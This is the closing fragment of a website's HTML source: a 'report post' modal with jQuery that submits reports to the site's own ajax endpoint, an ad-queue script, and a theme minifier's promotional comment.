<textarea class="report-post-control" rows="5" id="report_post_msg" name="report_post_msg"></textarea> </div> <div class="report-post-half-left"> </div> <div class="report-post-half-right"> </div> <div style="clear: both;"></div> </form> </div> <div id="report-post-buttons"> <br/> <a data-remodal-action="cancel" class="remodal-cancel">Cancel</a> <a id="report-post-submit" class="remodal-confirm">Report</a> </div> </div><script type="text/javascript"> jQuery(document).ready(function($) { window.REMODAL_GLOBALS = { NAMESPACE: 'report-post', DEFAULTS: { hashTracking: false, closeOnConfirm: false } } // add after var report_post_link = '<a href="#" class="report-post-button">Report </a>'; $('').after(report_post_link); var _remodal = $('[data-remodal-id=report-post]').remodal({modifier: 'with-red-theme', hashTracking: false, closeOnConfirm: false}); $(document).on('opened', '.remodal', function () { $('#report-post-buttons').slideDown(1000); $('#report-post-form').slideDown(1000, function() { if ($('#report_post_name').val()=='') { $('#report_post_name').focus(); } else { $('#report_post_msg').focus(); } }); }); $('#report-post-submit').click(function(e) { e.preventDefault(); $('#report-post-modal-desc').css('display', 'block'); $('#report-post-modal-msg').css('display', 'none'); $('.report-post-control').removeClass('report-post-control-error'); //_remodal.close(); $.post('https://system32.ink/ajax-call?action=wp_report_post', $('#report-post-form').serialize(), function(data) { if (data.errmsg) { $('#report-post-modal-desc').css('display', 'none'); $('#report-post-modal-msg').css('display', 'block'); $('#report-post-modal-msg').html(data.errmsg); $('#report-post-modal-msg').addClass('report-post-error'); $('#report-post-modal-msg').removeClass('report-post-success'); if (data.field) { $('#'+data.field).addClass('report-post-control-error'); $('#'+data.field).focus(); } else { $('#report_post_msg').focus(); } } if (data.msg) { $('#report-post-modal-desc').css('display', 'none'); $('#report-post-modal-msg').css('display', 'block'); $('#report-post-modal-msg').html(data.msg); $('#report-post-modal-msg').removeClass('report-post-error'); $('#report-post-modal-msg').addClass('report-post-success'); $('#report_post_msg').val(''); $('#report-post-form').slideUp(1000); $('#report-post-buttons').slideUp(1000); } }, 'json'); }); $('.report-post-link,.report-post-button,.report-post-custom-link,.report-post-custom-button').click(function(e) { e.preventDefault(); $('#report-post-modal-desc').css('display', 'block'); $('#report-post-modal-msg').css('display', 'none'); $('.report-post-control').removeClass('report-post-control-error'); var post_id=0; if ($(this).attr('post-id') != undefined) { post_id = parseInt($(this).attr('post-id')); } else { var article_id = $(this).closest('article').attr('id'); if (article_id != undefined) { var post_id = parseInt(article_id.replace( /^\D+/g, '')); } } $('#report-post-id').val(post_id); $.post('https://system32.ink/ajax-call?action=wp_report_post', {subaction: 'get-post', post_id: post_id}, function(data) { $('#report-post-title').html(data.post_title); _remodal.open(); }, 'json'); }); }); </script><script>window.advads_admin_bar_items = [];</script><script>!function(){window.advanced_ads_ready_queue=window.advanced_ads_ready_queue||[],advanced_ads_ready_queue.push=window.advanced_ads_ready;for(var d=0,a=advanced_ads_ready_queue.length;d<a;d++)advanced_ads_ready(advanced_ads_ready_queue[d])}();</script> </body></html> <!-- - Moddroid v8.2 auto minify for https://system32.ink 2024-05-26 - HTML compressed, size saved 3.93%. From 180450 bytes, now 173358 bytes - Buy now on https://exthem.es/item/moddroid-themes-premium/ - Demos https://moddroid.demos.web.id/ - Developer by https://exthem.es/ -->